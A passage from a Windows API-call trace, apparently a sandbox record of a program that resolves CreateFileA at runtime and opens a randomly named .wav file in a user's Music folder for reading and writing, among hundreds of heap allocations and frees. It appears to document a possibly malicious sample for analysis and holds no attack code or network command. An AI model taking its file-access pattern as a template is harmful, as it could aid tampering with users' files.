(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.522] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd918 [0187.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd918, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0187.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.523] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0187.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0187.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd918, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0187.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.524] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0187.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0187.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0187.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53) returned 0x8c4a48 [0187.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", lpUsedDefaultChar=0x0) returned 83 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.526] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\v01oknnppjh uahh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa6) returned 0x8fcbc0 [0187.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x8fcbc0, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav") returned 83 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.532] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.534] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0187.535] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.536] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.536] HeapFree (in: 